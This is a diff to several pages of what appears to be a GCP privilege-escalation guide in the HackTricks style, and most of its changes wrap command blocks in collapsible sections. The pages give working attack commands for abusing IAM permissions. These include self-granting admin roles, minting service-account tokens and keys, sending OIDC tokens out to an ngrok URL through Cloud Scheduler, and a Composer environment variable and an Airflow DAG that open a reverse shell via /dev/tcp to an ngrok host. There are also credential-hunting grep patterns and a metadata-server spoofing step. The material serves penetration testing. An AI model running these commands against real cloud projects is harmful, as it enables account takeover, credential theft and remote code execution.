bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
@@ -40,10 +53,15 @@ bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank,
bq insert dataset.table /tmp/mydata.json
```
</details>
### `bigquery.datasets.setIamPolicy`
An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset:
<details>
<summary>Set IAM policy on BigQuery dataset</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
@@ -54,10 +72,15 @@ bq add-iam-policy-binding \
# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```
</details>
### `bigquery.datasets.update`, (`bigquery.datasets.get`)
Just this permission allows to **update your access over a BigQuery dataset by modifying the ACLs** that indicate who can access it:
<details>
<summary>Update BigQuery dataset ACLs</summary>
```bash
# Download current permissions, requires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
@@ -67,10 +90,15 @@ bq update --source acl.json <proj>:<dataset>
bq head $PROJECT_ID:<dataset>.<table>
```
</details>
### `bigquery.tables.setIamPolicy`
An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table:
<details>
<summary>Set IAM policy on BigQuery table</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
@@ -81,17 +109,27 @@ bq add-iam-policy-binding \
# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```
</details>
### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
According to the docs, with the mentioned permissions it's possible to **update a row policy.**\
However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
<details>
<summary>Create or replace row access policy</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
```
</details>
It's possible to find the filter ID in the output of the row policies enumeration. Example:
<details>
<summary>List row access policies</summary>
```bash
bq ls --row_access_policies <proj>:<dataset>.<table>
@@ -100,8 +138,13 @@ It's possible to find the filter ID in the output of the row policies enumeratio
apac_filter term = "Cfba" user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09
```
</details>
If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:
<details>
<summary>Delete row access policies</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
@@ -110,6 +153,8 @@ bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
```
</details>
> [!CAUTION]
> Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However, this is prevented by BigQuery.

View File

@@ -16,12 +16,16 @@ For more information about Bigtable check:
Owning the instance IAM policy lets you grant yourself **`roles/bigtable.admin`** (or any custom role) which cascades to every cluster, table, backup and authorized view in the instance.
<details><summary>Grant yourself bigtable.admin role on instance</summary>
```bash
gcloud bigtable instances add-iam-policy-binding <instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
</details>
> [!TIP]
> If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it.
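A minimal sketch of that approach (the member is hypothetical; note that `set-iam-policy` overwrites the existing policy, so anything you omit is removed):

<details><summary>Overwrite instance IAM policy with a crafted document</summary>

```bash
# Craft a fresh policy that keeps you as admin (bindings not listed here are dropped)
cat > policy.json <<'EOF'
{
  "bindings": [
    {
      "role": "roles/bigtable.admin",
      "members": ["user:attacker@example.com"]
    }
  ]
}
EOF

gcloud bigtable instances set-iam-policy <instance-id> policy.json
```

</details>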
@@ -33,6 +37,8 @@ After having this permission check in the [**Bigtable Post Exploitation section*
Instance policies can be locked down while individual tables are delegated. If you can edit the table IAM you can **promote yourself to owner of the target dataset** without touching other workloads.
<details><summary>Grant yourself bigtable.admin role on table</summary>
```bash
gcloud bigtable tables add-iam-policy-binding <table-id> \
--instance=<instance-id> \
@@ -40,6 +46,8 @@ gcloud bigtable tables add-iam-policy-binding <table-id> \
--role='roles/bigtable.admin'
```
</details>
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) for more ways to abuse Bigtable permissions.
@@ -51,6 +59,8 @@ Backups can be restored to **any instance in any project** you control. First, g
If you have the permission `bigtable.backups.setIamPolicy` you could grant yourself the permission `bigtable.backups.restore` to restore old backups and try to access sensitive information.
<details><summary>Take ownership of backup snapshot</summary>
```bash
# Take ownership of the snapshot
gcloud bigtable backups add-iam-policy-binding <backup-id> \
@@ -59,6 +69,8 @@ gcloud bigtable backups add-iam-policy-binding <backup-id> \
--role='roles/bigtable.admin'
```
</details>
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to restore a backup.
@@ -68,6 +80,8 @@ After having this permission check in the [**Bigtable Post Exploitation section*
Authorized Views are supposed to redact rows/columns. Modifying or deleting them **removes the fine-grained guardrails** that defenders rely on.
<details><summary>Update authorized view to broaden access</summary>
```bash
# Broaden the subset by uploading a permissive definition
gcloud bigtable authorized-views update <view-id> \
@@ -93,6 +107,8 @@ gcloud bigtable authorized-views describe <view-id> \
--instance=<instance-id> --table=<table-id>
```
</details>
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to read from an authorized view.
### `bigtable.authorizedViews.setIamPolicy`
@@ -101,6 +117,8 @@ After having this permission check in the [**Bigtable Post Exploitation section*
An attacker with this permission can grant themselves access to an Authorized View, which may contain sensitive data that they would not otherwise have access to.
<details><summary>Grant yourself access to authorized view</summary>
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
@@ -109,6 +127,8 @@ gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--role='roles/bigtable.viewer'
```
</details>
Once you have this permission, check the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to see how to read from an authorized view.

View File

@@ -15,6 +15,8 @@
- `clientauthconfig.clients.delete`
- `clientauthconfig.clients.update`
<details><summary>Create OAuth brand and client</summary>
```bash
# Create a brand
gcloud iap oauth-brands list
@@ -23,6 +25,8 @@ gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_e
gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,6 +18,9 @@ Therefore, you can just make the machine exfiltrate to your server the token or
#### Direct exploitation via gcloud CLI
1- Create `cloudbuild.yaml` and modify it with your listener data
<details><summary>Cloud Build YAML configuration for reverse shell</summary>
```yaml
steps:
- name: bash
@@ -27,11 +30,19 @@ steps:
options:
logging: CLOUD_LOGGING_ONLY
```
</details>
2- Submit a simple build with no source, passing the yaml file and specifying the SA to use in the build:
<details><summary>Submit Cloud Build with specified service account</summary>
```bash
gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com"
```
</details>
#### Using python gcloud library
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
@@ -42,6 +53,8 @@ For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-pr
With this permission the user can get the **read access token** used to access the repository:
<details><summary>Get read access token for repository</summary>
```bash
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
@@ -50,10 +63,14 @@ curl -X POST \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"
```
</details>
### `cloudbuild.repositories.accessReadWriteToken`
With this permission the user can get the **read and write access token** used to access the repository:
<details><summary>Get read and write access token for repository</summary>
```bash
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
@@ -62,16 +79,22 @@ curl -X POST \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"
```
</details>
### `cloudbuild.connections.fetchLinkableRepositories`
With this permission you can **get the repos the connection has access to:**
<details><summary>Fetch linkable repositories</summary>
```bash
curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -26,6 +26,8 @@ An attacker with these privileges can **modify the code of a Function and even m
Some extra privileges like the `.call` permission for version 1 cloudfunctions or the role `roles/run.invoker` to trigger the function might be required.
<details><summary>Update Cloud Function with malicious code to exfiltrate service account token</summary>
```bash
# Create new code
temp_dir=$(mktemp -d)
@@ -56,6 +58,8 @@ gcloud functions deploy <cloudfunction-name> \
gcloud functions call <cloudfunction-name>
```
</details>
> [!CAUTION]
> If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` it's because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.
@@ -65,6 +69,8 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)**
<details><summary>Generate signed upload URL for Cloud Function</summary>
```bash
# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
@@ -73,6 +79,8 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca
-d '{}'
```
</details>
Not really sure how useful only this permission is from an attacker's perspective, but good to know.
### `cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs`

View File

@@ -14,15 +14,21 @@ For more information about the cloudidentity service, check this page:
If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:
<details><summary>Add yourself to a Cloud Identity group</summary>
```bash
gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER
```
</details>
### Modify group membership
If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:
<details><summary>Modify group membership to become OWNER</summary>
```bash
# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>
@@ -31,6 +37,8 @@ gcloud identity groups memberships describe --member-email <email> --group-email
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,34 +18,48 @@ An attacker with these permissions could exploit **Cloud Scheduler** to **authen
Create a new Storage bucket:
<details><summary>Create Cloud Scheduler job to create GCS bucket via API</summary>
```bash
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
```
</details>
To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**.
- **Exfiltrate OIDC service account token**
<details><summary>Create Cloud Scheduler job to exfiltrate OIDC token</summary>
```bash
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
# Listen in the ngrok address to get the OIDC token in clear text.
```
</details>
If you need to check the HTTP response you might just **take a look at the logs of the execution**.
### `cloudscheduler.jobs.update` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:
<details><summary>Update existing Cloud Scheduler job to exfiltrate OIDC token</summary>
```bash
gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
# Listen in the ngrok address to get the OIDC token in clear text.
```
</details>
Another example to upload a private key to a SA and impersonate it:
<details><summary>Upload private key to Service Account via Cloud Scheduler and impersonate it</summary>
```bash
# Generate local private key
openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
@@ -110,6 +124,8 @@ EOF
gcloud auth activate-service-account --key-file=/tmp/lab.json
```
</details>
## References
- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)

View File

@@ -8,6 +8,8 @@
An attacker with these permissions can **impersonate other service accounts** by creating tasks that execute with the specified service account's identity. This allows sending **authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions** services.
<details><summary>Create Cloud Task with service account impersonation</summary>
```bash
gcloud tasks create-http-task \
task-$(date '+%Y%m%d%H%M%S') \
@@ -20,20 +22,28 @@ gcloud tasks create-http-task \
--oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com
```
</details>
### `cloudtasks.tasks.run`, `cloudtasks.tasks.list`
An attacker with these permissions can **run existing scheduled tasks** without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.
<details><summary>Run existing Cloud Task without actAs permission</summary>
```bash
gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>
```
</details>
The principal executing this command **doesn't need `iam.serviceAccounts.actAs` permission** on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.
### `cloudtasks.queues.setIamPolicy`
An attacker with this permission can **grant themselves or other principals Cloud Tasks roles** on specific queues, potentially escalating to `roles/cloudtasks.admin` which includes the ability to create and run tasks.
<details><summary>Grant Cloud Tasks admin role on queue</summary>
```bash
gcloud tasks queues add-iam-policy-binding \
<queue_name> \
@@ -42,6 +52,8 @@ gcloud tasks queues add-iam-policy-binding \
--role roles/cloudtasks.admin
```
</details>
This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.
## References

View File

@@ -14,6 +14,8 @@ More info in:
It's possible to **attach any service account** to the newly created composer environment with that permission. Later you could execute code inside composer to steal the service account token.
<details><summary>Create Composer environment with attached service account</summary>
```bash
gcloud composer environments create privesc-test \
--project "${PROJECT_ID}" \
@@ -21,12 +23,16 @@ gcloud composer environments create privesc-test \
--service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"
```
</details>
More info about the exploitation [**here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh).
### `composer.environments.update`
It's possible to update a composer environment, for example, modifying env variables:
<details><summary>Update Composer environment variables for code execution</summary>
```bash
# Even if it says you don't have enough permissions the update happens
gcloud composer environments update \
@@ -50,29 +56,41 @@ X-Allowed-Locations: 0x0
{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
```
</details>
TODO: Get RCE by adding new pypi packages to the environment
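A possible direction for that TODO (untested sketch; the package name is hypothetical and would need to be attacker-controlled so its code runs when it is installed or imported by the Airflow workers):

<details><summary>Possible PyPI package injection (untested sketch)</summary>

```bash
# Install an attacker-controlled PyPI package into the environment
gcloud composer environments update <environment> \
    --location <location> \
    --update-pypi-package=<malicious-package>==1.0.0
```

</details>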
### Download Dags
Check the source code of the dags being executed:
<details><summary>Export and download DAGs from Composer environment</summary>
```bash
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
```
</details>
### Import Dags
Add the python DAG code into a file and import it by running:
<details><summary>Import malicious DAG into Composer environment</summary>
```bash
# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
```
</details>
Reverse shell DAG:
<details><summary>Python DAG code for reverse shell</summary>
```python
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
@@ -104,6 +122,8 @@ t1 = BashOperator(
do_xcom_push=False)
```
</details>
### Write Access to the Composer bucket
All the components of a composer environment (DAGs, plugins and data) are stored inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will fetch the backdoored version from the storage.
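A minimal sketch of that workflow (bucket and DAG names are placeholders; the bucket can usually be found in the environment's `config.dagGcsPrefix`):

<details><summary>Backdoor a DAG via the Composer bucket</summary>

```bash
# Find the bucket used by the environment (dagGcsPrefix)
gcloud composer environments describe <environment> --location <location> \
  --format="value(config.dagGcsPrefix)"

# List, download, backdoor and re-upload a DAG
gsutil ls gs://<composer-bucket>/dags/
gsutil cp gs://<composer-bucket>/dags/<victim_dag>.py .
# ... append a malicious task / reverse shell to <victim_dag>.py ...
gsutil cp <victim_dag>.py gs://<composer-bucket>/dags/<victim_dag>.py
```

</details>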

View File

@@ -8,10 +8,14 @@
This permission allows you to **gather credentials for the Kubernetes cluster** using something like:
<details><summary>Get Kubernetes cluster credentials</summary>
```bash
gcloud container clusters get-credentials <cluster_name> --zone <zone>
```
</details>
Without extra permissions, the credentials are pretty basic as you can **just list some resources**, but they are useful to find misconfigurations in the environment.
> [!NOTE]
@@ -19,6 +23,8 @@ Without extra permissions, the credentials are pretty basic as you can **just li
If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the cluster's info. A newly generated one looks like this:
<details><summary>Example kubectl config file for GKE cluster</summary>
```yaml
apiVersion: v1
clusters:
@@ -48,6 +54,8 @@ users:
name: gcp
```
</details>
### `container.roles.escalate` | `container.clusterRoles.escalate`
**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** than the ones the principal has. However, a **GCP** principal with those permissions will be **able to create/update Roles/ClusterRoles with more permissions** than the ones he holds, effectively bypassing the Kubernetes protection against this behaviour.
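A minimal sketch of what that bypass enables (assuming you already have kubectl access to the cluster; the role name is arbitrary):

<details><summary>Push a ClusterRole broader than your own permissions</summary>

```bash
# Normally Kubernetes rejects this unless you already hold the listed permissions
# (or the "escalate" verb); with container.clusterRoles.escalate the request is allowed.
cat > escalated-clusterrole.yaml <<'EOF'
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: escalated-role
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
EOF
kubectl apply -f escalated-clusterrole.yaml
```

</details>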

View File

@@ -22,6 +22,8 @@ I was unable to get a reverse shell using this method, however it is possible to
- Leak the service account token used by the cluster.
<details><summary>Python script to fetch SA token from metadata server</summary>
```python
import requests
@@ -43,6 +45,10 @@ if __name__ == "__main__":
fetch_metadata_token()
```
</details>
<details><summary>Submit malicious job to Dataproc cluster</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>
@@ -53,4 +59,6 @@ gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--region=<region>
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,33 +14,45 @@ Find more information about IAM in:
An attacker with the mentioned permissions will be able to update a role assigned to them and grant themselves extra permissions over other resources like:
<details><summary>Update IAM role to add permissions</summary>
```bash
gcloud iam roles update <role name> --project <project> --add-permissions <permission>
```
</details>
You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### `iam.serviceAccounts.getAccessToken` (`iam.serviceAccounts.get`)
An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
<details><summary>Impersonate service account to get access token</summary>
```bash
gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \
auth print-access-token
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### `iam.serviceAccountKeys.create`
An attacker with the mentioned permissions will be able to **create a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
<details><summary>Create service account key and authenticate</summary>
```bash
gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json
gcloud auth activate-service-account --key-file=/tmp/key.json
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
Note that **`iam.serviceAccountKeys.update` won't work to modify the key** of a SA because to do that the permission `iam.serviceAccountKeys.create` is also needed.
@@ -53,6 +65,8 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser
Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly:
<details><summary>Generate access token with delegation using API</summary>
```bash
curl -X POST \
'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \
@@ -64,6 +78,8 @@ curl -X POST \
}'
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### `iam.serviceAccounts.signBlob`
@@ -82,6 +98,8 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul
An attacker with the mentioned permissions will be able to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA:
<details><summary>Add IAM policy binding to service account</summary>
```bash
gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
--member="user:username@domain.com" \
@@ -93,6 +111,8 @@ gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.i
--role="roles/iam.serviceAccountUser"
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
### `iam.serviceAccounts.actAs`
@@ -115,6 +135,8 @@ According to this [**interesting post**](https://medium.com/google-cloud/authent
You can generate an OpenIDToken (if you have the access) with:
<details><summary>Generate OpenID token for service account</summary>
```bash
# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA
gcloud auth activate-service-account --key-file=/path/to/svc_account.json
@@ -122,12 +144,18 @@ gcloud auth activate-service-account --key-file=/path/to/svc_account.json
gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com
```
</details>
Then you can just use it to access the service with:
<details><summary>Use OpenID token to authenticate</summary>
```bash
curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app
```
</details>
Some services that support authentication via this kind of token are:
- [Google Cloud Run](https://cloud.google.com/run/)

View File

@@ -16,6 +16,8 @@ Note that in KMS the **permission** are not only **inherited** from Orgs, Folder
You can use this permission to **decrypt information with the key** you have this permission over.
<details><summary>Decrypt data using KMS key</summary>
```bash
gcloud kms decrypt \
--location=[LOCATION] \
@@ -26,10 +28,14 @@ gcloud kms decrypt \
--plaintext-file=[DECRYPTED_FILE_PATH]
```
</details>
### `cloudkms.cryptoKeys.setIamPolicy`
An attacker with this permission could **give himself permissions** to use the key to decrypt information.
<details><summary>Grant yourself KMS decrypter role</summary>
```bash
gcloud kms keys add-iam-policy-binding [KEY_NAME] \
--location [LOCATION] \
@@ -38,6 +44,8 @@ gcloud kms keys add-iam-policy-binding [KEY_NAME] \
--role roles/cloudkms.cryptoKeyDecrypter
```
</details>
### `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation`
Here's a conceptual breakdown of how this delegation works:
@@ -53,6 +61,8 @@ When you make a standard decryption request using the Google Cloud KMS API (in P
1. **Define the Custom Role**: Create a YAML file (e.g., `custom_role.yaml`) that defines the custom role. This file should include the `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation` permission. Here's an example of what this file might look like:
<details><summary>Custom role YAML definition</summary>
```yaml
title: "KMS Decryption via Delegation"
description: "Allows decryption via delegation"
@@ -61,16 +71,24 @@ includedPermissions:
- "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"
```
</details>
2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project:
<details><summary>Create custom KMS role</summary>
```bash
gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml
```
Replace `[YOUR_PROJECT_ID]` with your Google Cloud project ID.
</details>
3. **Grant the Custom Role to a Service Account**: Assign your custom role to a service account that will be using this permission. Use the following command:
<details><summary>Grant custom role to service account</summary>
```bash
# Give this permission to the service account to impersonate
gcloud projects add-iam-policy-binding [PROJECT_ID] \
@@ -85,6 +103,8 @@ gcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \
Replace `[YOUR_PROJECT_ID]` and `[SERVICE_ACCOUNT_EMAIL]` with your project ID and the email of the service account, respectively.
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -46,10 +46,14 @@ Check the following permissions:
Check if other users have logged in to gcloud inside the box and left their credentials in the filesystem:
<details><summary>Search for gcloud credentials in filesystem</summary>
```
sudo find / -name "gcloud"
```
</details>
These are the most interesting files:
- `~/.config/gcloud/credentials.db`
@@ -59,6 +63,8 @@ These are the most interesting files:
### More API Keys regexes
<details><summary>Grep patterns for GCP credentials and keys</summary>
```bash
TARGET_DIR="/path/to/whatever"
@@ -91,6 +97,8 @@ grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
```
</details>
## References
- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)

View File

@@ -30,22 +30,37 @@ To execute the spoofing, the following steps are necessary:
1. **Monitor requests to the Metadata server** using **tcpdump**:
<details>
<summary>Monitor metadata server requests with tcpdump</summary>
```bash
tcpdump -S -i eth0 'host 169.254.169.254 and port 80' &
```
</details>
Look for a line similar to:
<details>
<summary>Example tcpdump output line</summary>
```
<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1
```
</details>
2. Send the fake metadata data with the correct ETAG to rshijack:
<details>
<summary>Send fake metadata and SSH to host</summary>
```bash
fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost
```
</details>
This step authorizes the public key, enabling SSH connection with the corresponding private key.
## References

View File

@@ -8,6 +8,9 @@
An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
<details>
<summary>Get org policy info and disable enforcement</summary>
```bash
# Get info
